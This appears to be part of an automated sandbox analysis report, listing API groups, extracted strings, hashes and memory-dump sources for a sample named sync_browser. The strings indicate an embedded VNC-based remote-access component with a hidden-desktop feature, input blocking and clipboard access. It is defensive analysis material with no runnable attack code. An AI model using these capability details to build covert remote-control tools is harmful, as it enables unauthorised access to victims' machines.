                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                    • String ID: ./\
                                                    • API String ID: 385398445-3176372042
                                                    • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                    • Instruction ID: 0b24cc0f875d083defcf1afe3fb84a053dcc4ca85b625aadcfae7a48281458c5
                                                    • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                    • Instruction Fuzzy Hash: 8FE1636290D25287EB64AF21A04817EF7A0FB86F58FD44036EE8D17A95DF3DE454CB20
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$CloseEmptyOpen
                                                    • String ID:
                                                    • API String ID: 1427272684-0
                                                    • Opcode ID: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
                                                    • Instruction ID: 08597831ca1d771c54077b1f5fa90df779c4db3492103eae764eaf12f1f84111
                                                    • Opcode Fuzzy Hash: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
                                                    • Instruction Fuzzy Hash: 8BC14D21B096129BFA14AF65E8545BDE7A1EF89F88BC44036CE0E577A5EF3CE404D360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                    • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                    • API String ID: 33112563-1779637096
                                                    • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                    • Instruction ID: 54f7b0ec1efbf966317ea1c428f6cddb34655c854c34f592eb18613409fbd4a3
                                                    • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                    • Instruction Fuzzy Hash: 4BB12832508BD18BE3289F78F854A9EBBA4FB44B04FD4452ACBAA16250CF7DF055C764
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                    • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                    • API String ID: 2697070071-1399849103
                                                    • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                    • Instruction ID: 3fd543bfcd3a52e71c4476cd19f2362c018eefa5c3aa4eea4bb2d48e22425113
                                                    • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                    • Instruction Fuzzy Hash: 0381933562865287E718AB25A804A6EBB95FFC8F84FC44136DD8E57B68DF3CE005C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                    • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 2965397059-206656798
                                                    • Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                    • Instruction ID: d4bed274282cf3ca6d578e90bfd20624777937294eceff3416989574de8ca3ef
                                                    • Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                    • Instruction Fuzzy Hash: 2A42E522A0869286EB64AB35C8487FD6BA1EB84F98FC40233DE1D476D5CF3CD655C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                    • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                    • API String ID: 2145620463-2328478964
                                                    • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                    • Instruction ID: 52a6909fdf165abed375cf80c28fa6e182d04065c66ba22c0841d1d093dd3f43
                                                    • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                    • Instruction Fuzzy Hash: DCE1C222A186868BF720AF64D8446EDB7A1FF84B98FC04236DE4E57A94DF3CD945C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 246551654-3977938048
                                                    • Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                    • Instruction ID: ab93d2d14a02dc7cb7156f4b35cbcda3983abd6d317a924267c77c023b3fd530
                                                    • Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                    • Instruction Fuzzy Hash: 5522C132A086918BF7A4AB25C458BFD7BA1FB85B88FC44036CE4D576A5CF38D554C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                    • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                    • API String ID: 1729393483-4131161223
                                                    • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                    • Instruction ID: 761c6a55f46dea9aa78c74825876a33fe8fe9b20bd40f0b8f0654516ae91f980
                                                    • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                    • Instruction Fuzzy Hash: 72B1A032A096928BFB64AB24A4506BEB7A0FF85F58FC44036DE1D67684DF3CD905C724
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
                                                    • String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
                                                    • API String ID: 524771730-2664985301
                                                    • Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                    • Instruction ID: ee2adebd8b2bcb8f888a89f03bc532fe0f0914178dbb612bebd06fa525d127b6
                                                    • Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                    • Instruction Fuzzy Hash: FCD17135A09B96D6E7189B24A84096D7BA0FF48BA4FC04237DE6D477A0DF3CE521C320
                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32 ref: 00007FF7D5942E5D
                                                    • OpenServiceA.ADVAPI32 ref: 00007FF7D5942EAD
                                                    • GetLastError.KERNEL32 ref: 00007FF7D5942EBB
                                                    • CloseServiceHandle.ADVAPI32 ref: 00007FF7D5942EE0
                                                      • Part of subcall function 00007FF7D593A040: OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
                                                      • Part of subcall function 00007FF7D593A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
                                                      • Part of subcall function 00007FF7D593A040: GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
                                                      • Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
                                                      • Part of subcall function 00007FF7D593A040: MessageBoxA.USER32 ref: 00007FF7D593A0B7
                                                      • Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
                                                      • Part of subcall function 00007FF7D593A040: CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
                                                    • String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
                                                    • API String ID: 1921882253-4018834470
                                                    • Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                    • Instruction ID: 8a5ee36592aed125f6b4ac4ee7bdc29db2fb47299c753ede7815e1679f5f6da9
                                                    • Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                    • Instruction Fuzzy Hash: E4412C21A1861387FA58BB65A814ABDA7A1BF89F48FC41077DD0E472A4DF3CE9458730
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                    • String ID:
                                                    • API String ID: 1939172783-0
                                                    • Opcode ID: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
                                                    • Instruction ID: 5baf08e71fd12fa4c0ed077f9ae0b9ef0f3f90957bc78cee0fc26fa1add20b29
                                                    • Opcode Fuzzy Hash: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
                                                    • Instruction Fuzzy Hash: 78819E21A09B568BE658BF26A91057DB7A0FF85F84BC4413ADE5E477A4DF3CE021D310
                                                    APIs
                                                    Strings
                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF7D593AA4D
                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF7D593A9E6
                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF7D593A9BB
                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF7D593AA26
                                                    • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF7D593AAE1
                                                    • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF7D593AB1D
                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF7D593A94D
                                                    • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7D593AB3F
                                                    • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF7D593AAC1
                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7D593A97B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorInfoLastParametersSystem
